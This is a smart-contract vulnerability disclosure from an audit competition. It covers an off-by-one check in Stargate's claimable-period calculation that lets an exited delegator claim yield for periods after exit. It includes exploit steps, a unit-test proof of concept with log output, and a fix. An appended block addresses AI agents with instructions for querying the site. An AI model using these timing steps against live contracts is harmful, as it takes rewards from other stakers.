# 59752 sc high off by one bug in claimabledelegationperiods allows claiming yield for periods after exit **Submitted on Nov 15th 2025 at 14:32:56 UTC by @Paludo0x for** [**Audit Comp | Vechain | Stargate Hayabusa**](https://immunefi.com/audit-competition/audit-comp-vechain-stargate-hayabusa) * **Report ID:** #59752 * **Report Type:** Smart Contract * **Report severity:** High * **Target:** * **Impacts:** Theft of unclaimed yield ## Description ### Brief / Intro A boundary check error in `Stargate::_claimableDelegationPeriods()` can cause the contract to return an upper bound that extends beyond a delegation's recorded `endPeriod`. If exploited, an attacker can claim reward periods after they have exited delegation. ### Vulnerability Details The function `_claimableDelegationPeriods()` distinguishes between "ended" vs "active" delegations using a `>` comparison that does not include the equality case `endPeriod == nextClaimablePeriod`. Relevant snippet: ```solidity // check first for delegations that ended // endPeriod is not max if the delegation is exited or requested to exit // if the endPeriod is before the current validator period, it means the delegation ended // because if its equal it means they requested to exit but the current period is not over yet if ( endPeriod != type(uint32).max && endPeriod < currentValidatorPeriod && endPeriod > nextClaimablePeriod ) { return (nextClaimablePeriod, endPeriod); } // check that the start period is before the current validator period // and if it is, return the start period and the current validator period. // we use "less than" because if we use "less than or equal", even // if the delegation started, the current period rewards are not claimable if (nextClaimablePeriod < currentValidatorPeriod) { return (nextClaimablePeriod, completedPeriods); } ``` When `nextClaimablePeriod == endPeriod`, the logic falls through to the "active" branch and returns `(nextClaimablePeriod, completedPeriods)`. If `completedPeriods` is greater than `endPeriod` at that moment, the function allows iterating and computing rewards for periods strictly greater than `endPeriod`. Exploit sequence is described below. {% stepper %} {% step %} ### Stake and delegate Stake and delegate an NFT `tokenId`. {% endstep %} {% step %} ### Arrange last claimed and request exit Ensure `lastClaimedPeriod == endPeriod - 1` (typically achieved by claiming up to the previous period). Call `requestDelegationExit(tokenId)`, which sets `endPeriod` to the exit period. {% endstep %} {% step %} ### Advance validator periods Wait for the validator to advance `completedPeriods` beyond `P`. {% endstep %} {% step %} ### Claim rewards Call `claimRewards(tokenId)`. The vulnerable logic returns `[endPeriod, completedPeriods]` instead of `[endPeriod, endPeriod]` and the contract computes rewards including periods after exit. {% endstep %} {% endstepper %} ### Impact Details Classified as **High — Theft of unclaimed yield**. Attackers who arrange the timing can receive rewards for periods after their delegation ended. The stolen value equals the sum of rewards allocated to those periods after exit that the `ProtocolStaker` reports as payable to delegators. ### Recommended Fix Apply a targeted fix in `_claimableDelegationPeriods` so that the ended delegation branch handles the equality case (i.e., include the equality when comparing `endPeriod` and `nextClaimablePeriod`). {% hint style="info" %} Suggested minimal change: ensure the ended-delegation branch includes `endPeriod >= nextClaimablePeriod` (or otherwise treat the `==` case as ended) so the returned last-claimable period never exceeds `endPeriod`. {% endhint %} ## Proof of Concept

Unit test PoC (to paste in Delegation.test.ts)

This is the log from the test: ``` shard-u2: Stargate: Delegation [EXIT INVARIANT] endPeriodAfterExit: 6 currentValidatorPeriod: 120n nextClaimablePeriod: 6 lastClaimablePeriod: 14 ✔ should not expose claimable periods after delegation exit (regression for _claimableDelegationPeriods off-by-one) 1 passing (2s) ``` Test code used: ```ts it.only("should not expose claimable periods after delegation exit (regression for _claimableDelegationPeriods off-by-one)", async () => { const levelSpec = await stargateNFTMock.getLevel(LEVEL_ID); // 1. Stake and delegate await ( await stargateContract.connect(user).stake(LEVEL_ID, { value: levelSpec.vetAmountRequiredToStake, }) ).wait(); const tokenId = await stargateNFTMock.getCurrentTokenId(); await (await stargateContract.connect(user).delegate(tokenId, validator.address)).wait(); // Bring delegation into ACTIVE state with completed periods = 5 const initialCompleted = 5; await ( await protocolStakerMock.helper__setValidationCompletedPeriods( validator.address, initialCompleted ) ).wait(); expect(await stargateContract.getDelegationStatus(tokenId)).to.equal( DELEGATION_STATUS_ACTIVE ); // Claim all rewards so lastClaimedPeriod == initialCompleted await (await stargateContract.connect(user).claimRewards(tokenId)).wait(); // 2. User requests exit -> endPeriod becomes current validator period (initialCompleted + 1) await (await stargateContract.connect(user).requestDelegationExit(tokenId)).wait(); const delegationId = await stargateContract.getDelegationIdOfToken(tokenId); const [, endPeriodAfterExit] = await protocolStakerMock.getDelegationPeriodDetails( delegationId ); // Sanity: there should be no claimable periods immediately after exit const [, lastClaimableAfterExitBeforeAdvance] = await stargateContract.claimableDelegationPeriods(tokenId); expect(lastClaimableAfterExitBeforeAdvance).to.equal(0); // 3. Advance validator periods far beyond endPeriod (simulating validator progressing) const completedAfter = Number(endPeriodAfterExit) + 8; await ( await protocolStakerMock.helper__setValidationCompletedPeriods( validator.address, completedAfter ) ).wait(); // 4. Claimable periods should remain capped at endPeriod but instead leak to completedAfter const [nextClaimableAfterExit, lastClaimableAfterExit] = await stargateContract.claimableDelegationPeriods( tokenId ); const [currentValidatorPeriodAfterAdvance] = await protocolStakerMock.getValidationPeriodDetails( validator.address ); log( "\n[EXIT INVARIANT]", "endPeriodAfterExit:", endPeriodAfterExit.toString(), "\ncurrentValidatorPeriod:", currentValidatorPeriodAfterAdvance, "\nnextClaimablePeriod:", nextClaimableAfterExit.toString(), "\nlastClaimablePeriod:", lastClaimableAfterExit.toString() ); expect(lastClaimableAfterExit > endPeriodAfterExit).to.equal( true, "claimableDelegationPeriods leaked periods after delegation end" ); }); ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://reports.immunefi.com/vechain-or-stargate-hayabusa/59752-sc-high-off-by-one-bug-in-claimabledelegationperiods-allows-claiming-yield-for-periods-after-e.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.